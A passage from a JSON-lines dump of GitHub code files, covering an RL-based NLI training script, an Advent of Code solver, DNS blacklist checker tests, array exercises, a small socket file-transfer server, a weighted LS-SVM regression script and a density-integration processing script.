(s1_batch.nelement() + s2_batch.nelement()) / params.word_emb_dim\n\n #print(nli_net.classifier[4].bias)\n\n if len(all_costs) == 100:\n logs.append('{0} ; loss {1} ; sentence/s {2} ; words/s {3} ; accuracy train : {4}'.format(\n stidx, round(np.mean(all_costs), 2),\n int(len(all_costs) * params.batch_size / (time.time() - last_time)),\n int(words_count * 1.0 / (time.time() - last_time)),\n round(100.*correct.item()/(stidx+k), 2)))\n print(logs[-1])\n last_time = time.time()\n words_count = 0\n all_costs = []\n '''\n \n if LSTM_train:\n nli_net.update_target_network()\n pred = predict.data.max(1)[1]\n correct += pred.long().eq(tgt_batch.data.long()).cpu().sum()\n assert len(pred) == len(s1[stidx:stidx + params.batch_size])\n\n # loss\n all_costs.append(avgloss/params.batch_size)\n words_count += (s1_batch.nelement() + s2_batch.nelement()) / params.word_emb_dim\n\n #print(nli_net.classifier[4].bias)\n\n if len(all_costs) == 100:\n logs.append('{0} ; loss {1} ; sentence/s {2} ; words/s {3} ; accuracy train : {4}'.format(\n stidx, round(np.mean(all_costs), 2),\n int(len(all_costs) * params.batch_size / (time.time() - last_time)),\n int(words_count * 1.0 / (time.time() - last_time)),\n round(100.*correct.item()/(stidx+k), 2)))\n print(logs[-1])\n last_time = time.time()\n words_count = 0\n all_costs = []\n else:\n nli_net.assign_target_network()\n pred = predict.data.max(1)[1]\n correct += pred.long().eq(tgt_batch.data.long()).cpu().sum()\n assert len(pred) == len(s1[stidx:stidx + params.batch_size])\n\n # loss\n all_costs.append(avgloss/params.batch_size)\n words_count += (s1_batch.nelement() + s2_batch.nelement()) / params.word_emb_dim\n\n \n\n if len(all_costs) == 100:\n logs.append('{0} ; loss {1} ; sentence/s {2} ; words/s {3} ; accuracy train : {4}'.format(\n stidx, round(np.mean(all_costs), 2),\n int(len(all_costs) * params.batch_size / (time.time() - last_time)),\n int(words_count * 1.0 / (time.time() - last_time)),\n round(100.*correct.item()/(stidx+k), 2)))\n print(logs[-1])\n last_time = time.time()\n words_count = 0\n all_costs = []\n if LSTM_train:\n train_acc = round(100 * correct.item()/len(s1), 2)\n print('results : epoch {0} ; mean accuracy train : {1}'.format(epoch, train_acc))\n return train_acc\n else:\n return None\n\ndef evaluate(epoch, eval_type='valid', final_eval=False):\n nli_net.eval()\n correct = 0.\n global val_acc_best, lr, stop_training, adam_stop\n\n if eval_type == 'valid':\n print('\\nVALIDATION : Epoch {0}'.format(epoch))\n\n if eval_type == \"train\":\n s1 = train['s1']\n s2 = train['s2']\n target = train['label']\n if eval_type == \"test\":\n s1 = test['s1']\n s2 = test['s2']\n target = test['label']\n if eval_type == \"valid\":\n s1 = valid['s1']\n s2 = valid['s2']\n target = valid['label']\n\n for i in range(0, len(s1), params.batch_size):\n # prepare batch\n s1_batch, s1_len = get_batch(s1[i:i + params.batch_size], word_vec, params.word_emb_dim)\n s2_batch, s2_len = get_batch(s2[i:i + params.batch_size], word_vec, params.word_emb_dim)\n s1_batch, s2_batch = Variable(s1_batch.cuda()), Variable(s2_batch.cuda())\n tgt_batch = Variable(torch.LongTensor(target[i:i + params.batch_size])).cuda()\n\n # model forward\n output = nli_net((s1_batch, s1_len), (s2_batch, s2_len), \"target\")\n\n pred = output.data.max(1)[1]\n correct += pred.long().eq(tgt_batch.data.long()).cpu().sum()\n\n # save model\n eval_acc = round(100 * correct.item() / len(s1), 2)\n if final_eval:\n print('finalgrep : accuracy {0} : {1}'.format(eval_type, eval_acc))\n else:\n print('togrep : results : epoch {0} ; mean accuracy {1} :\\\n {2}'.format(epoch, eval_type, eval_acc))\n\n if eval_type == 'valid' and epoch <= params.n_epochs:\n if eval_acc > val_acc_best:\n print('saving model at epoch {0}'.format(epoch))\n if not os.path.exists(params.outputdir):\n os.makedirs(params.outputdir)\n torch.save(nli_net.state_dict(), os.path.join(params.outputdir,\n params.criticmodelname))\n val_acc_best = eval_acc\n else:\n if 'sgd' in params.optimizer:\n critic_active_optimizer.param_groups[0]['lr'] = critic_active_optimizer.param_groups[0]['lr'] / params.lrshrink\n print('Shrinking lr by : {0}. New lr = {1}'\n .format(params.lrshrink,\n critic_active_optimizer.param_groups[0]['lr']))\n if critic_active_optimizer.param_groups[0]['lr'] < params.minlr:\n stop_training = True\n if 'adam' in params.optimizer:\n # early stopping (at 2nd decrease in accuracy)\n stop_training = adam_stop\n adam_stop = True\n return eval_acc\n\ndef evaluate_RL(epoch, eval_type='valid', final_eval=False):\n nli_net.eval()\n actorModel.eval()\n correct = 0.\n global val_acc_best, lr, stop_training, adam_stop\n\n if eval_type == 'valid':\n print('\\nVALIDATION : Epoch {0}'.format(epoch))\n\n if eval_type == \"train\":\n s1 = train['s1']\n s2 = train['s2']\n target = train['label']\n if eval_type == \"test\":\n s1 = test['s1']\n s2 = test['s2']\n target = test['label']\n if eval_type == \"valid\":\n s1 = valid['s1']\n s2 = valid['s2']\n target = valid['label']\n\n ll, rl, ll_, rl_ = 0, 0, 0, 0\n deleteCount = dict()\n wordCount = dict()\n for i in range(0, len(s1)):\n if i % 100 == 0:\n print(\"Evaluating... \", i)\n # prepare batch\n s1_batch, s1_len = get_batch(s1[i:i + 1], word_vec, params.word_emb_dim)\n s2_batch, s2_len = get_batch(s2[i:i + 1], word_vec, params.word_emb_dim)\n s1_batch, s2_batch = Variable(s1_batch.cuda()), Variable(s2_batch.cuda())\n tgt_batch = Variable(torch.LongTensor(target[i:i + 1])).cuda()\n\n # model forward\n leftSummary = nli_net.summary((s1_batch, s1_len))[-1]\n rightSummary = nli_net.summary((s2_batch, s2_len))[-1]\n actions_left, states_left, Rinput_left, Rlength_left = Sampling_RL(s1_batch, rightSummary, int(s1_len), epsilon, Random=False)\n actions_right, states_right, Rinput_right, Rlength_right = Sampling_RL(s2_batch, leftSummary, int(s2_len), epsilon, Random=False)\n #print(s1_batch.size(), actions_left, Rinput_left.size(), s2_batch.size(), actions_right, Rinput_right.size(), \"\\n\\n\")\n output = nli_net((Rinput_left, np.array([Rlength_left])), (Rinput_right, np.array([Rlength_right])), scope = \"target\")\n\n pred = output.data.max(1)[1]\n\n if verbose:\n sourceL = s1[i:i + 1][0]\n sourceR = s2[i:i + 1][0]\n tempL, tempR = [], []\n \n for x in range(1,len(actions_left)-1):\n \n if sourceL[x] not in wordCount.keys():\n wordCount[sourceL[x]] = 1\n else:\n wordCount[sourceL[x]] += 1\n \n if actions_left[x] == 1:\n tempL.append(sourceL[x])\n if actions_left[x] == 0:\n if sourceL[x] not in deleteCount.keys():\n deleteCount[sourceL[x]] = 1\n else:\n deleteCount[sourceL[x]] += 1\n \n for x in range(1,len(actions_right)-1):\n \n if sourceR[x] not in wordCount.keys():\n wordCount[sourceR[x]] = 1\n else:\n wordCount[sourceR[x]] += 1\n\n if actions_right[x] == 1:\n tempR.append(sourceR[x])\n if actions_right[x] == 0:\n if sourceR[x] not in deleteCount.keys():\n deleteCount[sourceR[x]] = 1\n else:\n deleteCount[sourceR[x]] += 1\n \n with open(\"results.txt\", \"a\") as f:\n f.write(\" \".join(sourceL[1:-1]) + \"-----\" + \" \".join(sourceR[1:-1]) + \"\\n\")\n f.write(\" \".join(tempL) + \"-----\" + \" \".join(tempR) + \"\\nactual: \" + str(int(tgt_batch)) + \" pred: \" + str(int(pred)) + \"\\n\\n\")\n ll += len(actions_left)\n rl += len(actions_right)\n ll_ += Counter(actions_left)[1]\n rl_ += Counter(actions_right)[1] \n \n correct += pred.long().eq(tgt_batch.data.long()).cpu().sum()\n with open(\"results.txt\", \"a\") as f:\n f.write(\"Average left: \" + str(ll/len(s1)) + \"\\nAverage left new: \" + str(ll_/len(s1)) + \"\\nAverage right: \" + str(rl/len(s1)) + \"\\nAverage right new: \" + str(rl_/len(s1)))\n #f.write(deleteCount + \"\\n\\n\\n\" + wordCount)\n for key, value in sorted(deleteCount.items(), key=lambda item: item[1]):\n f.write(str(key) + \":\" + str(value) + \"\\n\")\n f.write(\"\\n\\n\\n\")\n for key, value in sorted(wordCount.items(), key=lambda item: item[1]):\n f.write(str(key) + \":\" + str(value) + \"\\n\")\n # save model\n eval_acc = round(100 * correct.item() / len(s1), 2)\n print(eval_type, \" accuracy: \", eval_acc)\n \n if final_eval:\n params.criticmodelname = bothCritic\n params.actormodelname = bothActor\n \n if eval_type == 'valid' and epoch <= params.n_epochs:\n if eval_acc > val_acc_best:\n print('saving model at epoch {0}'.format(epoch))\n if not os.path.exists(params.outputdir):\n os.makedirs(params.outputdir)\n torch.save(actorModel.state_dict(), os.path.join(params.outputdir, params.actormodelname))\n if final_eval:\n torch.save(nli_net.state_dict(), os.path.join(params.outputdir, params.criticmodelname))\n val_acc_best = eval_acc\n else:\n if final_eval:\n if 'sgd' in params.optimizer:\n critic_active_optimizer.param_groups[0]['lr'] = critic_active_optimizer.param_groups[0]['lr'] / params.lrshrink\n print('Shrinking lr by : {0}. New lr = {1}'\n .format(params.lrshrink,\n critic_active_optimizer.param_groups[0]['lr']))\n if critic_active_optimizer.param_groups[0]['lr'] < params.minlr:\n stop_training = True\n if 'adam' in params.optimizer:\n # early stopping (at 2nd decrease in accuracy)\n stop_training = adam_stop\n adam_stop = True\n return eval_acc\n\n\n\n\n''' INITIAL CRITIC TRAIN\n\"\"\"\nTrain model on Natural Language Inference task\n\"\"\"\nepoch = 1\nwhile not stop_training and epoch <= params.n_epochs:\n train_acc = trainepoch(epoch, RL_train = False)\n eval_acc = evaluate(epoch, 'valid')\n epoch += 1\n\n# Run best model on test set.\nnli_net.load_state_dict(torch.load(os.path.join(params.outputdir, params.criticmodelname)))\nprint(\"\\nCritic Loaded\")\nprint(evaluate(epoch, 'test'))\nprint(evaluate(epoch, 'valid'))\n'''\n\n'''\nprint(\"ACTOR TRAIN\")\nnli_net.load_state_dict(torch.load(os.path.join(params.outputdir, params.criticmodelname)))\nepoch = 1\nwhile not stop_training and epoch <= params.n_epochs:\n print(trainepoch(epoch, LSTM_train = False))\n eval_acc = evaluate_RL(epoch, 'valid')\n epoch += 1\n\nnli_net.load_state_dict(torch.load(os.path.join(params.outputdir, params.criticmodelname)))\nprint(\"\\nCritic Loaded\")\nactorModel.load_state_dict(torch.load(os.path.join(params.outputdir, params.actormodelname)))\nprint(\"\\nActor Loaded\")\n#print(evaluate_RL(epoch, 'train'))\n#print(evaluate_RL(epoch, 'test'))\nprint(evaluate_RL(epoch, 'test'))\n'''\n\nprint(\"FINAL CRITIC TRAIN\")\nnli_net.load_state_dict(torch.load(os.path.join(params.outputdir, params.criticmodelname)))\nprint(\"\\nCritic Loaded\")\nactorModel.load_state_dict(torch.load(os.path.join(params.outputdir, params.actormodelname)))\nprint(\"\\nActor Loaded\")\nepoch = 1\nwhile not stop_training and epoch <=params.n_epochs:\n train_acc = trainepoch(epoch)\n eval_acc = evaluate_RL(epoch, 'valid', final_eval = True)\n print(eval_acc)\n epoch += 1\nnli_net.load_state_dict(torch.load(os.path.join(params.outputdir, bothCritic)))\nprint(\"\\nCritic Loaded\")\nactorModel.load_state_dict(torch.load(os.path.join(params.outputdir, bothActor)))\nprint(\"\\nActor Loaded\")\nprint(evaluate_RL(epoch, 'test'))\n\n\n","repo_name":"souvik491/RL-Final-Assignment","sub_path":"RL - Souvik Kundu/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":30488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7766735382","text":"from itertools import product\n\ndef parse_instructions(lines):\n instructions = []\n for line in lines:\n instruction = {}\n tokens = line.split()\n if tokens[0] == 'mask':\n instruction['type'] = 'mask'\n instruction['value'] = tokens[-1]\n else:\n address = tokens[0].split('[')[1].split(']')[0]\n instruction['type'] = 'mem'\n instruction['address'] = int(address)\n instruction['value'] = int(tokens[-1])\n instructions.append(instruction)\n\n return instructions\n\n\ndef apply_mask(mask_string, number):\n\n binary = list(bin(number)[2:].rjust(36, '0'))\n\n x_indices = []\n for (i, char) in enumerate(mask_string):\n if char == '1':\n binary[i] = '1'\n if char == 'X':\n x_indices.append(i)\n\n numbers = []\n if not len(x_indices):\n numbers.append(binary)\n\n combinations = [[0,1] for index in x_indices]\n combinations = product(*combinations)\n\n for combination in combinations:\n new_binary = binary.copy()\n for (i,value) in enumerate(combination):\n new_binary[x_indices[i]] = str(value)\n numbers.append(new_binary)\n\n return list(map(lambda x: int(x, 2), map(lambda x: \"\".join(x), numbers)))\n\n\ndef run(instructions, memory):\n current_mask = None\n for instruction in instructions:\n if instruction['type'] == 'mask':\n current_mask = instruction['value']\n else:\n addresses = apply_mask(current_mask, int(instruction['address']))\n for address in addresses:\n memory[address] = instruction['value']\n\n\nwith open('input', 'r') as f:\n lines = [line.strip() for line in f.readlines()]\n\ninstructions = parse_instructions(lines)\n\nmemory = {}\n\nrun(instructions, memory)\n\nprint(sum(memory.values()))\n","repo_name":"medvesekg/adventofcode2020","sub_path":"14/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35337295884","text":"import pytest\n\nfrom aiodnsbl.checker import DNSBLChecker\nfrom aiodnsbl.providers import BASE_DOMAIN_PROVIDERS, BASE_PROVIDERS\n\n\n@pytest.mark.asyncio\nasync def test_checker():\n checker = DNSBLChecker()\n\n res = await checker.check(\"68.128.212.240\")\n assert res.blacklisted is True\n assert len(res.detected_by) > 0\n assert len(res.providers) == len(BASE_PROVIDERS)\n\n results = await checker.bulk_check([\"68.128.212.240\", \"8.8.8.8\"])\n assert len(results) == 2\n\n res = await checker.check(\"9.9.9.9\")\n assert res.blacklisted is False\n assert len(res.detected_by) == 0\n\n\n@pytest.mark.asyncio\nasync def test_checker_ipv6():\n checker = DNSBLChecker()\n res = await checker.check(\"2001:4860:4860::8844\")\n assert res.blacklisted is False\n\n\n@pytest.mark.asyncio\nasync def test_domain_checker():\n checker = DNSBLChecker()\n domain = \"example.com\"\n res = await checker.check(domain)\n assert res.blacklisted is False\n assert len(res.providers) == len(BASE_DOMAIN_PROVIDERS)\n\n\n@pytest.mark.asyncio\nasync def test_domain_idna():\n checker = DNSBLChecker()\n res = await checker.check(\"вуцхгйю.рф\")\n assert res.address == \"вуцхгйю.рф\"\n\n\n@pytest.mark.asyncio\nasync def test_domain_providers():\n checker = DNSBLChecker()\n res = await checker.check(\"google.com\")\n assert res.blacklisted is False\n\n\n@pytest.mark.asyncio\nasync def test_wrong_domain_format():\n invalid_inputs = [\"abc-\", \"8.8.8.256\"]\n for invalid_input in invalid_inputs:\n checker = DNSBLChecker()\n with pytest.raises(ValueError):\n await checker.check(invalid_input)\n\n\n@pytest.mark.asyncio\nasync def test_capitalization_in_domain():\n capitalized_domains = [\"Google.com\", \"Facebook.com\"]\n for domain in capitalized_domains:\n checker = DNSBLChecker()\n res = await checker.check(domain)\n assert res.blacklisted is False\n","repo_name":"ninoseki/aiodnsbl","sub_path":"tests/test_checker.py","file_name":"test_checker.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"18784246565","text":"# 5.0 Reorder List\ndef even_odd(A: list[int]) -> None:\n \"\"\"\n Reorder an integer list so that even entries appear first.\n \"\"\"\n next_even, next_odd = 0, len(A) - 1\n while next_even < next_odd:\n if A[next_even] % 2 == 0:\n next_even += 1\n else:\n A[next_even], A[next_odd] = A[next_odd], A[next_even]\n next_odd -= 1\n\n# 5.1 The Dutch National Flag Problem\ndef dutch_flag(A: list[int], pivot_idx: int) -> None:\n \"\"\"\n Takes an integer array, A, and an index, pivot_idx, and rearranges the elements such that all elements\n less than A[pivot_idx] (the \"pivot\") appear first, followed by elements equal to the pivot, followed\n by elements greater than the pivot.\n \"\"\"\n if len(A) < 2:\n return None\n\n if pivot_idx >= len(A):\n raise IndexError(\"Pivot index (idx) out of range.\")\n\n lesser = []\n equal = []\n greater = []\n for a in A:\n if a < A[pivot_idx]:\n lesser.append(a)\n elif a == A[pivot_idx]:\n equal.append(a)\n else:\n greater.append(a)\n \n lesser.extend(equal)\n lesser.extend(greater)\n\n for i in range(0,len(A)):\n A[i] = lesser[i]\n\ndef increment_array_integer(A: list[int]) -> None:\n \"\"\"\n Takes as input an array of digits encoding a nonnegative decimal integer D and updates\n the array to represent the integer D+1. For example, the input [1,2,9] is updated to\n [1,3,0]\n \"\"\"\n idx = len(A) - 1\n found = False\n\n while idx > -1 and found == False:\n if A[idx] < 9:\n A[idx] += 1\n found = True\n else:\n A[idx] = 0\n \n idx -= 1\n \n if idx == -1 and found == False:\n A.append(0)\n A[0] = 1\n","repo_name":"TommyHughes/eopi_python","sub_path":"arrays/exercises.py","file_name":"exercises.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26396373510","text":"import socket\n\nterminate_string = '-term-end-'\nBUFF_SIZE = 1024\n\nif __name__ == \"__main__\":\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_socket.bind(('127.0.0.1', 8080))\n server_socket.listen(10)\n\n while True:\n (client_socket, server) = server_socket.accept()\n\n result = ''.encode('utf-8')\n\n while True:\n data = client_socket.recv(BUFF_SIZE)\n\n if data.find(terminate_string.encode('utf-8')) != -1:\n data = data.replace(terminate_string.encode('utf-8'), ''.encode('utf-8'))\n result += data\n break\n\n result += data\n if len(data) < BUFF_SIZE:\n break\n\n if result.find(terminate_string.encode('utf-8')) != -1:\n result = result.replace(terminate_string.encode('utf-8'), ''.encode('utf-8'))\n print(f'length of result: {len(result)}')\n\n sendData = f'received {len(result)} bytes' + terminate_string\n send_len = client_socket.send(sendData.encode('utf-8'))\n\n if send_len != len(sendData):\n print('error on send')\n\n with open('./4k_image_received.jpg', 'wb') as f:\n f.write(result)\n\n client_socket.close()\n","repo_name":"OptimistLabyrinth/socket_programming","sub_path":"python3_implementation/v3/server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23713249054","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 5 09:30:24 2018\r\n\r\n@author: lj\r\n\"\"\"\r\nfrom numpy import *\r\n\r\ndef loadDataSet(filename):\r\n '''导入数据\r\n input: filename:文件名\r\n '''\r\n dataMat = []\r\n labelMat = []\r\n fr = open(filename)\r\n for line in fr.readlines():\r\n lineArr = line.strip().split('\\t')\r\n dataMat.append(float(lineArr[0]))\r\n labelMat.append(float(lineArr[1]))\r\n return mat(dataMat).T,mat(labelMat).T\r\n \r\n\r\ndef kernelTrans(X,A,kTup):\r\n '''数据集中每一个数据向量与A的核函数值\r\n input: X--特征数据集\r\n A--输入向量\r\n kTup--核函数参量定义\r\n output: K--数据集中每一个数据向量与A的核函数值组成的矩阵\r\n '''\r\n X = mat(X)\r\n m,n = shape(X)\r\n K = mat(zeros((m,1)))\r\n if kTup[0] == 'lin':\r\n K = X * A.T\r\n elif kTup[0] == 'rbf':\r\n for j in range(m):\r\n deltaRow = X[j] - A\r\n K[j] = deltaRow * deltaRow.T\r\n K = exp(K/(-1 * kTup[1] ** 2))\r\n else: raise NameError('Houston We Have a Problem ,That Kernel is not recognized')\r\n return K\r\n \r\nclass optStruct:\r\n def __init__(self,dataMatIn,classLabels,C,kTup):\r\n self.X = dataMatIn\r\n self.labelMat = classLabels\r\n self.C = C\r\n self.m = shape(dataMatIn)[0]\r\n self.alphas = mat(zeros((self.m,1)))\r\n self.b = 0\r\n self.K = mat(zeros((self.m,self.m))) #特征数据集合中向量两两核函数值组成的矩阵,[i,j]表示第i个向量与第j个向量的核函数值\r\n for i in range(self.m):\r\n self.K[:,i] = kernelTrans(self.X, self.X[i,:], kTup)\r\n \r\n\r\ndef leastSquares(dataMatIn,classLabels,C,kTup):\r\n '''最小二乘法求解alpha序列\r\n input:dataMatIn:特征数据集\r\n classLabels:分类标签集\r\n C:参数,(松弛变量,允许有些数据点可以处于分隔面的错误一侧)\r\n kTup: 核函数类型和参数选择 \r\n output:b--w.T*x+b=y中的b\r\n alphas:alphas序列 \r\n '''\r\n ##1.参数设置\r\n oS = optStruct(dataMatIn,classLabels,C,kTup)\r\n unit = mat(ones((oS.m,1))) #[1,1,...,1].T\r\n I = eye(oS.m)\r\n zero = mat(zeros((1,1)))\r\n upmat = hstack((zero,unit.T))\r\n downmat = hstack((unit,oS.K + I/float(C)))\r\n ##2.方程求解\r\n completemat = vstack((upmat,downmat)) #lssvm中求解方程的左边矩阵\r\n rightmat = vstack((zero,oS.labelMat)) # lssvm中求解方程的右边矩阵\r\n b_alpha = completemat.I * rightmat\r\n ##3.导出偏置b和Lagrange乘子序列\r\n oS.b = b_alpha[0,0]\r\n for i in range(oS.m):\r\n oS.alphas[i,0] = b_alpha[i+1,0]\r\n e = oS.alphas/C\r\n return oS.alphas,oS.b,e\r\n\r\ndef weights(e):\r\n '''计算权重序列\r\n input:e(mat):LSSVM误差矩阵\r\n output:v(mat):权重矩阵\r\n '''\r\n ##1.参数设置\r\n c1 = 2.5\r\n c2 = 3\r\n m = shape(e)[0]\r\n v = mat(zeros((m,1)))\r\n v1 = eye(m)\r\n q1 = int(m/4.0)\r\n q3 = int((m*3.0)/4.0)\r\n e1 = []\r\n shang = mat(zeros((m,1)))\r\n ##2.误差序列从小到大排列\r\n for i in range(m):\r\n e1.append(e[i,0])\r\n e1.sort()\r\n ##3.计算误差序列第三四分位与第一四分位的差\r\n IQR = e1[q3] - e1[q1]\r\n ##4.计算s的值\r\n s = IQR/(2 * 0.6745)\r\n ##5.计算每一个误差对应的权重\r\n for j in range(m):\r\n shang[j,0] = abs(e[j,0]/s)\r\n for x in range(m):\r\n if shang[x,0] <= c1:\r\n v[x,0] = 1.0\r\n if shang[x,0] > c1 and shang[x,0] <= c2:\r\n v[x,0] = (c2 - shang[x,0])/(c2 - c1)\r\n if shang[x,0] > c2:\r\n v[x,0] = 0.0001\r\n v1[x,x] = 1/float(v[x,0])\r\n return v1\r\n\r\ndef weightsleastSquares(dataMatIn,classLabels,C,kTup,v1):\r\n '''最小二乘法求解alpha序列\r\n input:dataMatIn:特征数据集\r\n classLabels:分类标签集\r\n C:参数,(松弛变量,允许有些数据点可以处于分隔面的错误一侧)\r\n kTup: 核函数类型和参数选择 \r\n output:b--w.T*x+b=y中的b\r\n alphas:alphas序列 \r\n '''\r\n ##1.参数设置\r\n oS = optStruct(dataMatIn,classLabels,C,kTup)\r\n unit = mat(ones((oS.m,1))) #[1,1,...,1].T\r\n #I = eye(oS.m)\r\n gamma = kTup[1]\r\n zero = mat(zeros((1,1)))\r\n upmat = hstack((zero,unit.T))\r\n downmat = hstack((unit,oS.K + v1/float(C)))\r\n ##2.方程求解\r\n completemat = vstack((upmat,downmat)) #lssvm中求解方程的左边矩阵\r\n rightmat = vstack((zero,oS.labelMat)) # lssvm中求解方程的右边矩阵\r\n b_alpha = completemat.I * rightmat\r\n ##3.导出偏置b和Lagrange乘子序列\r\n oS.b = b_alpha[0,0]\r\n for i in range(oS.m):\r\n oS.alphas[i,0] = b_alpha[i+1,0]\r\n e = oS.alphas/C\r\n return oS.alphas,oS.b\r\n\r\n\r\ndef predict(alphas,b,dataMat):\r\n '''预测结果\r\n input:alphas(mat):WLSSVM模型的Lagrange乘子序列\r\n b(float):WLSSVM模型回归方程的偏置\r\n dataMat(mat):测试样本集\r\n output:predict_result(mat):测试结果\r\n '''\r\n m,n = shape(dataMat)\r\n predict_result = mat(zeros((m,1)))\r\n for i in range(m):\r\n Kx = kernelTrans(dataMat,dataMat[i,:],kTup) #可以对alphas进行稀疏处理找到更准确的值 \r\n predict_result[i,0] = Kx.T * alphas + b \r\n return predict_result\r\n\r\ndef predict_average_error(predict_result,label):\r\n '''计算平均预测误差\r\n input:predict_result(mat):预测结果\r\n label(mat):实际结果\r\n output:average_error(float):平均误差\r\n '''\r\n m,n = shape(predict_result)\r\n error = 0.0\r\n for i in range(m):\r\n error += abs(predict_result[i,0] - label[i,0])\r\n average_error = error / m\r\n return average_error\r\n \r\n\r\n\r\nif __name__ == '__main__':\r\n ##1.数据导入\r\n print('--------------------Load Data------------------------')\r\n dataMat,labelMat = loadDataSet('sine.txt')\r\n ##2.参数设置\r\n print('--------------------Parameter Setup------------------')\r\n C = 0.6\r\n k1 = 0.3\r\n kernel = 'rbf'\r\n kTup = (kernel,k1)\r\n ##3.求解LSSVM模型\r\n print('-------------------Save LSSVM Model-----------------')\r\n alphas,b,e = leastSquares(dataMat,labelMat,C,kTup)\r\n ##4.计算误差权重\r\n print('----------------Calculate Error Weights-------------')\r\n v1 = weights(e)\r\n ##5.求解WLSSVM模型\r\n print('------------------Save WLSSVM Model--------------- -')\r\n alphas1,b1 = weightsleastSquares(dataMat,labelMat,C,kTup,v1)\r\n ##6.预测结果\r\n print('------------------Predict Result------------------ -')\r\n predict_result = predict(alphas1,b1,dataMat)\r\n ##7.平均误差\r\n print('-------------------Average Error------------------ -')\r\n average_error = predict_average_error(predict_result,labelMat)\r\n \r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"shiluqiang/WLSSVM_python","sub_path":"wlssvm.py","file_name":"wlssvm.py","file_ext":"py","file_size_in_byte":6856,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"32"} +{"seq_id":"26006455408","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib\n# matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom scipy.io import savemat\nfrom scipy.io import loadmat\nimport timeit\n\n# import density integration functions\nfrom DensityIntegrationUncertaintyQuantification import Density_integration_Poisson_uncertainty\nfrom DensityIntegrationUncertaintyQuantification import Density_integration_WLS_uncertainty\n\nimport loadmat_functions\n\nimport helper_functions\n\ndef main():\n \n # file containing displacements and uncertainties\n filename = 'sample-displacements.mat'\n \n # displacement estimation method ('c' for correlation and 't' for tracking)\n displacement_estimation_method = 'c'\n \n # displacement uncertainty method ('MC' for correlation and 'crlb' for tracking)\n displacement_uncertainty_method = 'MC'\n\n # set integration method ('p' for poisson or 'w' for wls)\n density_integration_method = 'w'\n \n # dataset type (syntehtic or experiment)\n dataset_type = 'synthetic'\n\n # -------------------------------------------------\n # experimental parameters for density integration\n # -------------------------------------------------\n experimental_parameters = dict()\n\n # ambient/reference density (kg/m^3)\n experimental_parameters['rho_0'] = 1.225\n\n # uncertainty in the reference density (kg/m^3) (MUST BE GREATER THAN 0)\n experimental_parameters['sigma_rho_0'] = 1e-10\n\n # gladstone dale constant (m^3/kg)\n experimental_parameters['gladstone_dale'] = 0.225e-3\n\n # ambient refractive index\n experimental_parameters['n_0'] = 1.0 + experimental_parameters['gladstone_dale'] * experimental_parameters['rho_0']\n\n # thickness of the density gradient field (m)\n experimental_parameters['delta_z'] = 0.01\n\n # distance between lens and dot target (object / working distance) (m)\n experimental_parameters['object_distance'] = 1.0\n\n # distance between the mid-point of the density gradient field and the dot pattern (m)\n experimental_parameters['Z_D'] = 0.25\n\n # distance between the mid-point of the density gradient field and the camera lens (m)\n experimental_parameters['Z_A'] = experimental_parameters['object_distance'] - experimental_parameters['Z_D']\n \n # distance between the dot pattern and the camera lens (m)\n experimental_parameters['Z_B'] = experimental_parameters['object_distance']\n\n # origin (pixels)\n experimental_parameters['x0'] = 256 \n experimental_parameters['y0'] = 256 \n\n # size of a pixel on the camera sensor (m)\n experimental_parameters['pixel_pitch'] = 10e-6\n\n # focal length of camera lens (m)\n experimental_parameters['focal_length'] = 105e-3\n\n # non-dimensional magnification of the dot pattern (can also set it directly)\n experimental_parameters['magnification'] = experimental_parameters['focal_length'] / (\n experimental_parameters['object_distance'] - experimental_parameters['focal_length'])\n\n # uncertainty in magnification\n experimental_parameters['sigma_M'] = 0.1\n\n # uncertainty in Z_D (m)\n experimental_parameters['sigma_Z_D'] = 1e-3\n\n\n # non-dimensional magnification of the mid-z-PLANE of the density gradient field\n experimental_parameters['magnification_grad'] = experimental_parameters['magnification'] \\\n * experimental_parameters['Z_B'] / experimental_parameters['Z_A']\n \n # --------------------------\n # processing\n # --------------------------\n # load displacements and uncertainties from file \n if displacement_estimation_method == 'c':\n # correlation\n X_pix, Y_pix, U, V, sigma_U, sigma_V, Eval = helper_functions.load_displacements_correlation(filename, displacement_uncertainty_method) \n elif displacement_estimation_method == 't':\n # tracking\n X_pix, Y_pix, U, V, sigma_U, sigma_V = helper_functions.load_displacements_tracking(filename, experimental_parameters['dot_spacing'], displacement_uncertainty_method) \n\n # account for sign convention\n if dataset_type == 'synthetic':\n U *= -1\n V *= -1\n\n # create mask array (1 for flow, 0 elsewhere) - only implemented for Correlation at the moment\n if displacement_estimation_method == 'c':\n mask = helper_functions.create_mask(X_pix.shape[0], X_pix.shape[1], Eval)\n elif displacement_estimation_method == 't': \n mask = np.ones_like(a=U)\n\n # convert displacements to density gradients and co-ordinates to physical units \n X, Y, rho_x, rho_y, sigma_rho_x, sigma_rho_y = helper_functions.convert_displacements_to_physical_units(X_pix, Y_pix, U, V, sigma_U, sigma_V, experimental_parameters, mask)\n\n # define dirichlet boundary points (minimum one point) - here defined to be all boundaries\n # This is specific to the current dataset\n dirichlet_label, rho_dirichlet, sigma_rho_dirichlet = helper_functions.set_bc(X_pix.shape[0], X_pix.shape[1], experimental_parameters['rho_0'], experimental_parameters['sigma_rho_0'])\n \n # calculate density and uncertainty\n if density_integration_method == 'p':\n # Poisson\n rho, sigma_rho = Density_integration_Poisson_uncertainty(X, Y, mask, rho_x, rho_y,\n dirichlet_label, rho_dirichlet,\n uncertainty_quantification=True,\n 